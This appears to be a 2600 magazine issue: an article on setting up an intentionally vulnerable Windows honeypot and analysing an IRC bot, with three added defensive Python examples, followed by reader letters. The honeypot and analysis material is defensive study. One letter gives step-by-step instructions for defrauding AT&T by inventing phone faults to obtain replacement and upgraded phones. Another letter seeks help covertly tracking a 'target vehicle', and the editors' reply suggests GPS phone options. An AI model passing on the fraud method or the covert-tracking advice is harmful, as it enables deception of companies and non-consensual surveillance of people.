You will need a few things before you begin. Search on Google or simply use similar utilities with which you are more familiar. First, Win2k or WinXP Service Pack one. We're talking virgin Microsoft software here. Your goal is maximum vulnerabilities. Second, a packet sniffer you are familiar with. Most sane people use Wireshark, but there are many others out there. A good project would be to write your own! Third, the evaluation version of DiamondCS Port Explorer. This shows you which processes are tied to which ports and which ports are sending and receiving data. Fourth, Process Explorer by Sysinternals/Microsoft. This is like task manager on steroids. Fifth, UltraVNC server or another VNC server that you are familiar with. This isn't necessary but will speed up the infection of your honeypot by botware. And, finally, a blank notepad window on another machine, or go oldschool and use a pen and paper.

It should be noted that while your machine will be infected regardless, it would be wise to make your honeypot look "lived-in." Most script kiddies will infect any machine they can, but the more savvy bot herders will avoid a machine that looks like an obvious honeypot. Your default Windows 2000 Advanced Server installation with the sickly blue desktop won't get nearly the attention that Grandma's home computer would. Set a different desktop image, and add a few spreadsheets on the desktop listing "account information" or recipes. Perhaps you also want to have a text file or two with notes from fake company meetings or pictures of the grandkids. The ideal target for bot herders is a lonely, always-on, corporate workstation that is in use by multiple people. Think of a print server or the guest machine at the end of the hallway. Accountability on these types of machines is almost always at a minimum and their tubes to the intarweb are usually huge, which is exactly what the bot herder wants. If you don't have a fat pipe, make your honeypot look like something your grandparents use to send pictures and email to friends and family. Dust off those social engineering skills!

Next, unplug the network cable to your honeypot. This is the only way to be completely certain that you are not on the network. Install your Windows with default settings, and write these settings down in your notepad. This makes it easier to manage things: trust me. Change your Administrator password to "password." Install any drivers that you need to operate your hardware. Install Wireshark, Process Explorer, Port Explorer, and UltraVNC Server. Change the password for UltraVNC Server to "password." If you are running a server version of the OS, change your passwords for FTP and IIS to "password" as well. Disable the Messenger Service. This is not required,
but it reduces annoying popup boxes begging you to install malware. Reboot. Log in to your honeypot and start Wireshark. It's always nice to have it update the window in real time, so check that box. Also start Process Explorer and Port Explorer. Now, plug your network cable in. If you have a hardware firewall or router such as that blue Linksys box by your cable modem, you need to log in to it and configure a DMZ with the IP address of your honeypot. This will tell your router to expose the honeypot to the network, sans router protection.
Perhaps thirty seconds to thirty hours later, your host will be infected. Some infections are more obfuscated than others, but you can tell that your honeypot has definitely been infected when it starts a lot of outgoing connections on port 135, 137, 139, or 445. A lot of infection vectors are on these ports, for obvious reasons. Although your host is compromised, it will probably be infected with a simple mailer trojan or a worm instead of a bot. Either way, you have malware to examine. At this point, you have a couple of options. You can immediately disconnect your honeypot from the network as you have what you need. You could also leave your host running and capture the traffic using Wireshark. This is recommended if you want to ensure that you will be infected by a bot and to observe someone sending commands to bots. Beware, however, that if you leave your honeypot connected to the network for an extended period, you will likely get flagged by your ISP for all that excessive traffic. If you are having trouble getting your honeypot infected, it certainly helps to install programs like Microsoft SQL Server 2000, Exchange Server 2000, or Outlook Express. Use default settings and passwords. The goal here is to increase the number of vulnerabilities on your machine.
Note that by using VNC, your honeypot will be infected pretty quickly. However, it will likely be attacked by a real human being instead of a bot. VNC allows a person to remotely operate your computer as if they were sitting in front of it. Therefore, you want to obfuscate the fact that you are running Wireshark, Port Explorer, and programs like that. If the hacker spots any of these programs, it will send up huge red flags. He or she will likely leave your honeypot alone and possibly report your IP to his or her friends as a honeypot. Keep your programs minimized, or, at the very least, keep them in the System Tray. Leave your honeypot alone; you don't want to keep screwing with the mouse every five minutes, because this will scare the attacker away if he sees it.
Whatever decision you make about how much malware to collect, you need to preserve as much of the infection as possible. This means that you need to identify which files were uploaded to your honeypot, what those files did to your honeypot, and how to store those files so you can look at them later in a sterile environment. Viewing which processes are connecting to strange ports by using Port Explorer and identifying those files are good places to start, but you might miss a few dll or ini files that go with the main executable. On a default installation of Windows with a relatively tiny number of files, the simplest way to find everything involved is to search your machine for every file on the hard disk. Go to Start-Search-All files and folders-"*.*", and then sort by modification date by clicking "Date Modified" twice to summon a list of likely suspects. These instructions will probably generate a few letters giving far more efficient and clever ways to do this and listing everything that's wrong with this way and why. I suggest that the newbie reader find and read a few of those letters to improve upon this method. It probably wouldn't hurt the old pro to take a look, as well.
Ensure that you have a clean medium to store these little nasties! I can't impress upon readers enough that you shouldn't be using your roommate's backup drive, your personal USB thumb drive, or a network share to store all this malware! You are flirting with disaster by mixing the two worlds of honeypot and personal network. The best way to do this would be to find a virgin USB thumb drive or to start writing them to CD. Store each instance of malware in its own directory.
I'm going to show you how I observed and dissected an example bot that I took from my infected honeypot. This analysis concerns just one variety of bot, which I will call TardBot. The instance of TardBot that I grabbed for this analysis was installed on a machine that was running VNC with very default login credentials. The hacker who infected my honeypot used other bots to scan various IP address ranges looking for computers running a VNC server with weak login credentials or an older, exploitable version of the server. According to my sniffer logs, his bots first scanned the honeypot on VNC's TCP port 5900 about fourteen hours before he arrived personally. There was repeated scanning of the honeypot on the VNC port, spaced about an hour and a half apart, perhaps to check uptime.
Though there is generally a trend for hackers to do their work during the night at the host location, this hack was done at 10:15am on a Tuesday morning local time. This is perhaps not the smartest move the attacker could've made, considering that the honeypot was disguised as a corporate workstation. He logged in to the honeypot and opened Internet Explorer, and then navigated to a rooted webserver
with a .ro domain, where the hacker stored one of his botware executables. After the executable was downloaded, he ran it via Start-Run. That's it. The hacker then logged off, not even bothering to remove his work from the browser's history list. The executable was a dropper, a small and simple application that downloaded the rest of his botware to C:\Windows\Temp. According to the sniffer logs, the main botware was downloaded from a different rooted webserver than the dropper.
TardBot is actually a set of barebones utilities working together instead of just one executable. You will find that this is a very common practice, since a lot of people running botnets generally lack any real computer skills; they are thus incapable of writing or too lazy to write their own programs. Because of this, they will use prepackaged bot kits readily available in a variety of places. You would not be mistaken in calling them script kiddies, though, like any community, there are a number of very intelligent and experienced hands doing business in this field.
TardBot is packaged in an executable archive approximately 2.5 megabytes in size. I ran this archive several times on a disconnected, vanilla Windows installation to analyze how it embedded itself in the honeypot. Once downloaded, TardBot is executed by the dropper. If the honeypot was infected automatically by a Windows exploit instead of through VNC, there would be no visible evidence that the machine was compromised. The installation itself is almost completely transparent. To the average office worker or grandmother, the whole process would go by so quickly that they probably wouldn't think twice about it. Depending on the purpose of the bot, the user may notice a slowdown of the computer or the network. Think how many times you've heard someone mention that their computer is "running slow." Malware can be a significant cause of this problem.
The executable archive dropped several executables, their associated ini and dll files, and a batch file into the same directory that it was downloaded to. Next, the archive ran the batch file, which I will call pwned.bat. It is the heart of the installation procedure. It first ran a small application that added registry keys to HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run for an FTP server and for the main bot. It then conducted a silent installation of Serv-U, an FTP server commonly used by bot herders. The ini files associated with it were custom-written with accounts and passwords which the hacker would know. After the installation completed, pwned.bat started the main bot application, which itself ran another application on startup, a "guardian" program that made sure the main bot program was running and would start it otherwise. The last thing pwned.bat did was to clean up after itself by deleting the dropper, the TardBot executable archive, the Serv-U installation files, and itself. TardBot was now fully functional.
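One way to inventory what an installer like this leaves behind, as an added example that is not part of the original article: snapshot the disconnected test machine before and after running the sample and compare content hashes, which goes beyond the "Date Modified" sort suggested earlier because it still catches a file whose timestamp was put back. The file names, Run values and demo tree are constructed placeholders, and `read_run_key` only works on Windows.

```python
import hashlib
import os
import tempfile

RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"


def snapshot(root):
    """Return {relative path: (sha256 hex, size, mtime_ns)} for every file under root."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
                st = os.stat(full)
            except OSError:
                continue  # locked or vanished mid-walk: skip it, keep walking
            snap[os.path.relpath(full, root)] = (digest, st.st_size, st.st_mtime_ns)
    return snap


def diff_snapshots(before, after):
    """Classify paths by comparing content hashes, not timestamps."""
    return {
        "added": sorted(p for p in after if p not in before),
        "removed": sorted(p for p in before if p not in after),
        "changed": sorted(p for p in after
                          if p in before and after[p][0] != before[p][0]),
    }


def read_run_key():
    """Read the HKLM Run values as {name: command line}. Windows only."""
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
        for i in range(winreg.QueryInfoKey(key)[1]):
            name, data, _type = winreg.EnumValue(key, i)
            values[name] = data
    return values


def new_run_entries(before, after):
    """Run values that are new, or whose command line changed."""
    return {n: c for n, c in after.items() if before.get(n) != c}


def demo():
    """Constructed stand-in for the before/after runs on the disconnected machine."""
    with tempfile.TemporaryDirectory() as root:
        temp = os.path.join(root, "Temp")
        os.makedirs(temp)
        ini = os.path.join(root, "app.ini")
        with open(ini, "w") as fh:
            fh.write("setting=1\n")
        old = os.stat(ini)
        with open(os.path.join(temp, "installer.tmp"), "w") as fh:
            fh.write("left over from setup\n")
        before = snapshot(root)

        # Simulated install: three constructed files appear in Temp, one temp
        # file is deleted, and one existing file is edited with its old
        # timestamps restored, which a "Date Modified" sort would not surface.
        for name in ("svc.exe", "svc.ini", "helper.dll"):
            with open(os.path.join(temp, name), "w") as fh:
                fh.write("constructed placeholder for " + name + "\n")
        os.remove(os.path.join(temp, "installer.tmp"))
        with open(ini, "a") as fh:
            fh.write("setting=2\n")
        os.utime(ini, ns=(old.st_atime_ns, old.st_mtime_ns))
        after = snapshot(root)

    run_before = {"VMTools": r"C:\Tools\vmtray.exe"}           # constructed
    run_after = dict(run_before,                               # constructed
                     svc=r"C:\Windows\Temp\svc.exe",
                     ftp=r"C:\Windows\Temp\ftpd.exe")
    return (diff_snapshots(before, after),
            new_run_entries(run_before, run_after), before, after)


if __name__ == "__main__":
    files, runs, _before, _after = demo()
    for kind, paths in files.items():
        print(kind, paths)
    print("new Run values:", runs)
```

Files the batch file deleted again (the dropper, the archive, itself) exist in neither snapshot, so they have to be recovered from the sniffer capture instead.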
The main bot application connected to several different IRC servers and joined at least one password-protected channel on each server, as determined by the custom-written ini files. It is important to note that a plaintext file with server, username, and password information can have any extension, even exe. IRC is by far the most common protocol used to link individual bots to their masters and to other bots. The great benefit (or drawback) to using IRC is that the protocol requires messages to be broadcast to everyone in a channel. Much like Ethernet, the individual computer or bot determines which messages are intended for it and ignores all others. It is therefore extremely easy to sniff traffic going to any other individual person or bot, even when using the "private" message command. In this way, it becomes possible to catch the many different commands used to control the bots, as well as any chat text which the hacker might conduct among friends in the bot channels. This is an extremely interesting glimpse into the bot herder culture.
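The sniffed IRC session can be reduced to the facts an analyst wants, shown here as an added example that is not from the original article: which server password, nick and channel keys the bot sent, and who addressed the channel or the bot itself. The capture lines, nicks and hostnames are constructed, and the `>`/`<` direction markers are an assumed export format for the reassembled stream.

```python
from collections import defaultdict


def parse_irc(line):
    """Split one IRC line into (prefix, COMMAND, params) using RFC 1459 framing."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    # Everything after the first " :" is a single trailing parameter.
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None          # empty or prefix-only line
    if sep:
        parts.append(trailing)
    return prefix, parts[0].upper(), parts[1:]


def summarize(capture):
    """capture: iterable of (direction, line); '>' means sent by the honeypot."""
    info = {"server_pass": None, "nick": None, "channels": {}, "inbound": []}
    for direction, raw in capture:
        msg = parse_irc(raw)
        if msg is None:
            continue
        prefix, cmd, params = msg
        if direction == ">":
            if cmd == "PASS" and params:
                info["server_pass"] = params[0]
            elif cmd == "NICK" and params:
                info["nick"] = params[0]
            elif cmd == "JOIN" and params:
                # JOIN takes comma-separated channels and, optionally, keys.
                chans = params[0].split(",")
                keys = params[1].split(",") if len(params) > 1 else []
                for i, chan in enumerate(chans):
                    info["channels"][chan] = keys[i] if i < len(keys) else None
        elif cmd == "PRIVMSG" and len(params) >= 2:
            sender = (prefix or "").split("!", 1)[0]
            info["inbound"].append((sender, params[0], params[1]))
    return info


def senders_by_target(info):
    """Group inbound messages: who addressed each channel or the bot's own nick."""
    seen = defaultdict(set)
    for sender, target, _text in info["inbound"]:
        seen[target].add(sender)
    return {target: sorted(nicks) for target, nicks in seen.items()}


# Constructed capture: every name and string below is made up for illustration.
CAPTURE = [
    (">", "PASS srvpass-example\r\n"),
    (">", "NICK hp-7731\r\n"),
    (">", "USER hp hp irc.example.net :hp\r\n"),
    ("<", ":irc.example.net 001 hp-7731 :Welcome\r\n"),
    (">", "JOIN #chan-a,#chan-b key-a-example\r\n"),
    ("<", ":herder!u@host.example PRIVMSG #chan-a :<constructed command text>\r\n"),
    ("<", ":friend!u@other.example PRIVMSG #chan-a :anyone around?\r\n"),
    ("<", ":herder!u@host.example PRIVMSG hp-7731 :<constructed private text>\r\n"),
    ("<", "PING :irc.example.net\r\n"),
    ("<", "\r\n"),
]

if __name__ == "__main__":
    summary = summarize(CAPTURE)
    print("server password:", summary["server_pass"])
    print("bot nick:", summary["nick"])
    print("channels and keys:", summary["channels"])
    print("who spoke where:", senders_by_target(summary))
```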
The instance of botware infecting the honeypot in this case was not for sending email spam, and it did not noticeably diminish performance. From the logs, it was apparent that TardBot was scanning, but that it was doing so at a throttled pace so as to prevent detection. During the approximately four days that TardBot was left running, the instance on the honeypot was used variously for FTP storage, scanning and DDoSing IRC and web servers. Be aware that the infection you capture may be entirely different in form, function, and level of sophistication. Some cutting-edge bots use encryption schemes to hide the traffic used to control them and are entirely custom-built by experienced programmers. Most of these advanced hackers are making money through their botnets, rather than flooding websites or other IRC servers. Dissecting these bots is an altogether more complex and entertaining experience.
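The article names two signs of scanning from an infected honeypot: a lot of outgoing connections on ports 135, 137, 139 or 445, and TardBot's throttled scanning. The following added example (not from the original article) counts distinct destinations per time window over connection records exported from the sniffer, so that a slow scan is still caught by a long window; the record layout, thresholds and sample records are assumptions constructed for illustration.

```python
from collections import deque

WATCHED_PORTS = {135, 137, 139, 445}   # the ports the article names
HONEYPOT = "192.0.2.50"                # constructed address (documentation range)


def fanout_alerts(records, honeypot_ip, window, threshold):
    """Times at which the honeypot had contacted >= threshold distinct
    destinations on watched ports within the trailing `window` seconds.

    records: iterable of (timestamp_seconds, src_ip, dst_ip, dst_port).
    """
    recent = deque()   # (timestamp, destination), oldest first
    alerts = []
    for ts, src, dst, dport in sorted(records):
        if src != honeypot_ip or dport not in WATCHED_PORTS:
            continue   # inbound traffic and other ports are not this signal
        recent.append((ts, dst))
        while recent and recent[0][0] <= ts - window:
            recent.popleft()
        if len({d for _t, d in recent}) >= threshold:
            alerts.append(ts)
    return alerts


def classify(records, honeypot_ip, burst=(60, 20), slow=(6 * 3600, 50)):
    """Return (label, first alert time). Both (window, threshold) pairs are
    assumed values; tune them against the honeypot's clean baseline."""
    fast = fanout_alerts(records, honeypot_ip, *burst)
    if fast:
        return "burst scan", fast[0]
    throttled = fanout_alerts(records, honeypot_ip, *slow)
    if throttled:
        return "throttled scan", throttled[0]
    return "no scan seen", None


def constructed_burst():
    # 30 different destinations in 30 seconds, worm style.
    return [(i, HONEYPOT, f"198.51.100.{i + 1}", 445) for i in range(30)]


def constructed_throttled():
    # One new destination every two minutes: never more than one per minute.
    return [(i * 120, HONEYPOT, f"198.51.100.{i + 1}", 135 if i % 2 else 445)
            for i in range(100)]


def constructed_quiet():
    # Repeated use of one file server, an inbound probe, and some web traffic.
    records = [(i * 300, HONEYPOT, "192.0.2.10", 445) for i in range(5)]
    records.append((10, "203.0.113.5", HONEYPOT, 445))
    records.append((20, HONEYPOT, "203.0.113.80", 80))
    return records


if __name__ == "__main__":
    for name, maker in (("burst", constructed_burst),
                        ("throttled", constructed_throttled),
                        ("quiet", constructed_quiet)):
        print(name, classify(maker(), HONEYPOT))
```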
That's all. I hope you've managed to learn at least something. If not, I hope you were at least entertained for a few minutes.
Shouts to bee, shea and his crew arik, the culprit, everybody from K and MUM and the wet blanket from flavor co. Also, I'm adding the following resource for Americans, which is a compilation of different states' computer laws: http://www.ncsl.org/programs/lis/CIP/hacklaw.htm
Suggestions
Dear 2600:
Hey just saying a while ago I read a letter here saying if your mouse is jittery that you're being watched. Well, just to put my two cents out there, there is a program that lets you block your IP from everyone. It's called Peer Guardian. If you activate it, your mouse will stop jittering and you're not being watched anymore. It also helps when pirating stuff.
Nsane HAcker
It's so nice of the watchers to make it this easy to detect their presence. The piracy world must be breathing one huge sigh of relief.
Dear 2600:
After reading the article "Gaming AT&T Mobility" by The Thomps in the Spring 2008 issue, I have something to add that was not mentioned. This info comes from personal experience as a customer.
While Thomps had a section of his article titled "Free Phones" he only talked about getting discounts (which I might add was quite ingenious), not getting a phone for free. It is possible to obtain phones from them for free.
You don't even have to be eligible for an upgrade or buy additional accessories to do this. All you need is a phone that is still under warranty with AT&T. They give you a one year warranty when you buy a phone from them. A lot of people don't even realize they have this warranty. So let's say you own an HTC 8525. You want the Tilt, don't you.... It has GPS, you know you want it. What you do is call in and tell them you have a problem with your phone. Make a problem up; it has to be something unrelated to the battery and can't seem like it would be considered abuse or other damage that would void your warranty. For instance, tell them the reception seems to be degraded from when you first purchased the phone, or maybe the phone freezes all the time or buttons intermittently work. They will gladly try to solve the problem for you, but of course you will tell them none of the solutions worked. They will end up shipping you another phone. After you get the phone, call them up again. Tell them this one has the same problem, or another problem of your choice. You want them to send you another phone.
You will do this a total of three times, then on your final call you will tell them that you have had enough, replacing these 8525s isn't getting anywhere - you want a different phone. The next closest phone is the Tilt, so that is what you can get out of them. I have done this twice, worked perfectly both times. The only drawback with this method is that you can only get a similar phone to what you have currently. You could work your way up to the best phone over time though. Keep in mind the social engineering skills that Thomps explained in his article. The tricky part about this is getting them to believe there is a problem that can only be solved by sending a new phone and then making them believe the only way you'll remain happy is with a better phone. Just be creative and have a plan for everything.
Greg
This is living proof that lying and being a royal pain in the ass is the true secret to success. If you could keep going at this rate, it wouldn't be long before you owned the company outright. This is a true American success story that serves as an inspiration to us all.
Inquiries
Dear 2600:
I have a few questions and requests for advice from the phone phreaks, the net savvy, and the engineers among us. Is there such thing as a prepaid cell phone service that has GPS (or other triangulation) features for real-time tracking? Would using an anonymizer website while tracking it over the net be sufficient to dust a trail of the IP address of the "desktop" portion of the surveillance?
I'm also seeking advice on a project I envision completing: an economical way to modify a common GMRS or FRS radio to function with a control unit that would transmit a signal with a 1 kHz tone at, for example, ten second intervals while a vehicle is stopped, and at three second intervals once movement of the vehicle is detected. A combination of a piezoelectric switch on a microprocessor which would control the radio comes to my mind. I have plenty of experience at troubleshooting, repairing, and building electronics contraptions but next to none engineering them as is the nature of this project. The prices of ones I've shopped for commercially have been somewhere between absurd and astronomical. And a huge percentage of that investment goes into a river or gets beat with a sledgehammer if the transmitter gets discovered. I'm also considering changing the radio's crystal so as to avoid the signal getting "walked over" by anyone transmitting nearby on the same frequency, intercepted by curious scanning enthusiasts, etc. As of now, my RF scanner would be used as the receiver, but eventually I plan to progress to a receiver with an analog meter movement and highly sensitive gain control. Perhaps the third stage of this progression will be to build my own triangulation receiver. Anyway, even in its most basic form, this "bumper beacon" will give me the ability to more quickly find, then narrow down the location of the parked target vehicle (provided of course that it is within range of suspected locations). I will greatly appreciate feedback and advice on how I can design and accomplish this little project.
Just in case you're wondering about my motives, I'm a professional "people watcher" i.e., a Private Investigator, providing needed services for good people being done wrong by others in matters of civil law. The PI message boards and email groups would go ape-dung if such questions as the ones above were posted there. Plus the design questions would likely be too technical for all but a few of them.
Carl
The only prepaid service we're aware of with full-blown GPS is Boost Mobile's iDEN product (they market both iDEN and CDMA products, and only the iDEN product includes a precise GPS receiver). You could, in theory, write an application to log the location periodically and post it to a website using the data connectivity package.
Sprint also sells something called Sprint Family Locator. See https://sfl.sprintpcs.com/finder-sprint-family/signIn.htm for details. This will provide the approximate location of your target. However, it is not available as a prepaid service.
Dear 2600:
Are you guys still accepting photos of payphones for your website? There are many interesting payphones in Taiwan now, but they have evolved into something more like kiosk computers with touch screens. I can send some photos to you if you would like to see them.
Tommy
By all means send them in. The address is payphones@2600.com. Be sure to use the highest quality settings on your camera as low settings don't print well in the magazine.
Dear 2600:
First off, I really appreciate the hard work you guys put into producing such a great publication. It's changed my perception of technology greatly. A friend and I have been inspired to start a 2600 meeting in our local area (Belfast, Northern Ireland) and we were wondering if there is any particular format that these meetings need to have?
redtape
It's all pretty straightforward. The meetings need to be open to all in a public area with no admission charge, age restriction, or anything like that. There's a more detailed set of guidelines on our website at www.2600.com/meetings. It's also important to keep us updated by emailing meetings@2600.com so we know you're continuing to run the meetings. Good luck!
Dear 2600:
Is there any particular reason you replied to me with a gigantic email of stuff I didn't need to know? Do you get many questions to meetings@2600.com? Because as I must contact you about the meetings in Tulsa, I'm not exactly served by this.
Did I do something wrong?
Joseph
You didn't do anything wrong but that's the way the system operates. Most people who email that address are looking for information on the meetings so we have our robot automatically send a full list back plus the set of meeting guidelines. Some people enter into a dialogue with what they assume is a really fast typing human. But you only get that big mail the first time you send email to the address (and after a certain number of weeks beyond that). The alternative to this system would be to have yet another email address for those people reporting on meetings. That would lead to a lot more work and traffic than simply deleting that one piece of mail we send.
Dear 2600:
I am trying to expand the links page on my website www.bayareakicks.com, and I would like to add your website (www.2600.com/phones) to that list. Some websites do not like when others link to them, so I would like to receive permission from you first.
The thousands of daily viewers that read my website are Internet savvy and are always looking for new websites to visit. I figured you wouldn't mind if I link to your site since it would give you slightly increased traffic. Does this sound OK to you? Are you able to link to my website? I look forward to your reply.
Mike
We don't do links ourselves but we certainly don't mind anyone linking to us however they please. And even if we did mind, we don't believe we would have any right to object. It's amazing that so many people live by rules that basically make no sense.
Dear 2600:
I write following finding your site on the web after many years of being very busy with an IT career and making stupid mistakes such as getting involved with relationships. I became aware of 2600 many years ago but never really got into practical things. I noticed that there is a meeting in Glasgow, Scotland. Can you give me any more information regarding this or indeed if it still happens. I look forward to your response.
Liam/M/37
The only way to know if it's still happening is to go there and see. Even if nobody else shows up, there's nothing stopping you from breathing new life into it. But we appreciate being told if the meetings die out so we don't have to squish so many of them onto page 66. Lately it seems as if everyone is complaining about the tiny type.
Dear 2600:
2600 is the best magazine ever, but the tiny type is killing me as my eyes are getting worse and worse every year. Have you ever thought of having an email version of the magazine that people could subscribe to? I would love to get my 2600s as a PDF, DOC, or maybe just a plain old text file. One thing it would save is me having to type in the programs. I could just copy and paste instead. In the meantime, keep up the great work and I'll just buy a more powerful magnifying glass.
SAR
We now put all of the code up on our website so you don't have to retype any of it. We're always looking for new and innovative ways of doing things. The latest is our 900 page book of some of our best articles which is just hitting the shelves with much larger type.
Dear 2600:
How can I use the services of a hacker?
etsjobs
Whereas most religions require you to pray or do
some sort of penance in order to obtain the goods
and services you desire, with hackers you have but to
ask and pay our nominal fee. Obtain any password,
change any grade, even travel back in time when
necessary! Your wish (plus the fee) is our command.
Now go tell all your friends.
Dear 2600:
I would like to get your new book called The Best of 2600: A Hacker Odyssey when your book comes out in July 2008. Where can I buy your new book? And what does your new book cover? Can you send me some printout of the Table of Contents of your book called The Best of 2600: A Hacker Odyssey? And what will your new book cost? Also, can we buy this book from you? Would you please send me any info you have about your new book? I will be looking forward to hearing from you. And to getting your new book.
John
We believe you're referring to our new book. It's available everywhere, both online and in bookstores. It retails for $39.99 and covers the three decades that 2600 has been around. We don't sell it ourselves as it's sold directly through the publisher (Wiley). We're real happy we could finally pull this off and get so much of the historical material we've published since 1984 out into the mainstream. Let's hope it does well so we can do more fun projects like this.
Dear 2600:
Urgent! I need a new identity for me and my daughter because we are victims of abuse illegally. Send me information please.
Eva
Do you really believe that emailing total strangers is the best way to start a new life? We're not the witness relocation people but even if we were, it's not the kind of thing you do casually. You can find a whole lot of tips on the net about how to hide and/or protect your privacy. Advertising your problems to anyone who will listen is probably the first item on the list of things not to do.
Dear 2600:
I have this stupid "ShopAtHome SelectRebates" thingie in my toolbar that refuses to be deleted. How do I get rid of the program In Toto? I mean, I went into the "Program Files" and deleted all that I could, but there were some things that refused to be deleted. What gives?
Z
You need a decent malware/adware/general crap removal program that isn't worse than the stuff it's supposed to be getting rid of. We're not going to recommend one over another because it'll just start endless bickering that none of us will live to see the end of. Look at the platform you have and find some programs that will run in your environment, then look for user reviews of their performance before actually installing them. And in the future, be careful of what you download or open on your system as this is how such garbage gets there in the first place.
Dear 2600:
I found your journal in a Borders, bought it quickly, and was pleasantly surprised. It's provided a useful resource to the digital image research I do that I'd prefer not to say anything else about. I do have a question for you and your 2600 readers: Is there a method for finding and restoring metadata that's been purposely erased from digital images? This information could be quite, quite useful. Keep up the good work.
Haestar
This sounds like material for a really informative article if someone out there has done the research.
Dear 2600:
I have put together an article that I would like to submit to 2600 for your consideration. Do you have an editorial calendar and guidelines available or can I just submit the article? Can I include exhibits? Do you prefer a Word document or PDF files? Please let me know.
R
Just send us what you've got. We can read most anything but to be safe always send along a plain ASCII text file. The email address is articles@2600.com.
Dear 2600:
let me in... so what do i have to do to get in? im trading code to this guy for nice computers. usenet would nice. it would be nice. im going to have a mindset with nuemonic reach and a storage partition of a 100 gb with terrar process. but i dont have any other
Phobus
No, you certainly don't.
Dear 2600:
Do you folks accept press releases? We recently announced a new software product that we think is really timely: an easy to use drive migration utility. Can we send you our press release or a copy of the software to review?
Would much appreciate a reply.
Donna
We accept all kinds of crap from people and we suspect a bunch of press releases would fit that definition. But we'd rather not have to wade through a pile of public relations nonsense in order to get to the words of our readers, which is what the email address (letters@2600.com) you contacted is set up for. Oh yes, and we also don't send out personal replies. But you knew that.
Dear 2600:
Best greets from Austria. It's really hard to get a copy of 2600 here, but congratulations to your great magazine.
A friend of mine and I have written an article about the basics of the lockpicking sport. The article contains an introduction to the sport in general, a short explanation of the link between hacking and lockpicking and the basic techniques like picking and bumping. Impressioning is not covered in the article.
Are you interested in this kind of article? Do you also ship magazines to Austria? Do you have a partner here?
Tom
We have many partners in crime in Austria, but so far no partners in magazine distribution. Your best bet is just to get a subscription and have it mailed to you directly from us. And of course we'd be interested in seeing your article.
Dear 2600:
Tell me how much one of your hackers would charge me to delete my criminal record from the Texas police database.
[Name Deleted]
Well, we would start with erasing your latest crime, that of soliciting a minor to commit another crime. (Your request was read by a small child here in the office.) After you're all paid up on that, we will send out the bill for hiding your identity by not printing your real name, which you sent us like the meathead you apparently are. After that's all sorted, we can assemble our team of hackers, who sit around the office waiting for such lucrative opportunities as this to come along, and figure out even more ways to shake you down. It's what we do, after all. Just ask Fox News.
Dear 2600:
I have a lot of hacking related pics on my phone and I was wondering how I should get them to you in a usable format since I do not have anything that will hook up to my computer to get the pictures off of the phone. Any advice would be very helpful.
erik
It seems odd that you have a picture phone with no means of sharing pictures. If you can use email on your phone, you could always email them to us. If that doesn't work, you're just going to have to send us the phone. (And don't forget the charger.)
Dear 2600:
Here I am plowing through a shameful backlog of one year's worth of 2600. Whilst taking a break, it occurred to me to investigate how much I've spent on 2600 since I started purchasing at the newsstand in 1995. I have a collection of about 44 issues with an approximate average price of $5.65. I've spent about $250 on 2600 over the years. So, I'm kicking myself for not considering a lifetime subscription sooner. Do you guys think you'll be able to keep on trucking at least another ten years so I could get more bang for my buck upon ordering a lifetime subscription?
Also, are lifetime subscriptions transferable or does it absolutely end with me? Let's say, for example, one of my children takes a liking to your magazine and I become a penniless widower stricken with glaucoma. Can my child then carry the mantle of 2600 reader of the family on my $260?
Aside: does 2600 have a game plan if one or more of the critical staff is met with injury or death that prevents them from working on the magazine? Have you tapped anyone to take over the reins if the life of the magazine outlasts those of critical staff members?
I apologize for my questions spiraling towards the morbid. I'm at that age where life and death seem to be occurring in equal quantities.
Acidevil
Well, thanks for depressing the hell out of all of us. Clearly we need to start thinking about how to incorporate death into our business plan. We'll try to get on it. But first we need to get through The Last HOPE.
Lifetime subscriptions really are intended for your (or our) lifetime. When one of those ends, the subscription ends. It's not meant to last for the lifetime of the human race, as you are apparently already plotting to do through your future unborn generations. If this kind of abuse prevails, we might have to cap these subscriptions at 120 years or however long people are living to these days.
We'll make every attempt to live long enough to ensure that you get your money's worth from your lifetime subscription. This is the solemn promise we make to all of our readers.
Dear 2600:
I subscribed in December of 2007 and have only received the first quarter mag. Has the second quarter gone out yet?
chris
Yes, and you really should have gotten it. Please
let us know if you see this.
Dear 2600:
I'd like to publish two articles, can I meet a staff member?
Musique Maison
Not so fast there. You don't get a personal visit
until you publish 20 articles! Nice try though.
Dear 2600:
What do you think about LifeLock? Seems to me that just some common sense protection of your personal information is enough. The adverts seem a little extreme, with the guy sharing his SSN and all.
eroOcool
You're referring to the company whose CEO goes around advertising his Social Security number saying that he has nothing to worry about because he uses the service he's peddling to protect his identity. All this tells us is that the availability of SSNs has gotten so common that it's almost a trivial detail at this point. We're expected to give them to the phone company, employers, banks, schools, and virtually anyone who asks for them. Since so many people still don't know how to say no, a whole business based on fear has popped up under the guise of protecting you from exploitation. You really don't need a company to do this. As you say, a little common sense goes a long way. Keep your private information to yourself, don't advertise anything about your private life on the Internet that you wouldn't want Charles Manson to know about, and keep a close eye out for any electronic transactions that may not be yours. Like any disease, prevention and early treatment will go a long way.
Observations
Dear 2600:
First off I need to apologize if my English seems a bit weird. I speak German as my native language and I am not 100 percent bilingual. Recently I enjoyed a laugh while trying to call a friend of mine who lives in New York City. I dialed 718-238-9901 by accident (friend's number is actually a couple of digits off) and received the recorded "station 10" for the 77th Street DMS-100. If rock and roll fans who call this number think "The King" is dead, turns out he's been working for Verizon this whole time.
Anyhow, I have been reading 2600 for at least a couple of years now and am enjoying what I am reading. I really find it interesting especially with regard to the telephone articles. I get a kick out of calling some of the odd telephone numbers sent in occasionally by readers and I even bought a Track Phone not too long ago just for phone exploration of this type.
Ride tuff and always have your Track Phone handy. Thankya ver' much.
fOxR4c3r
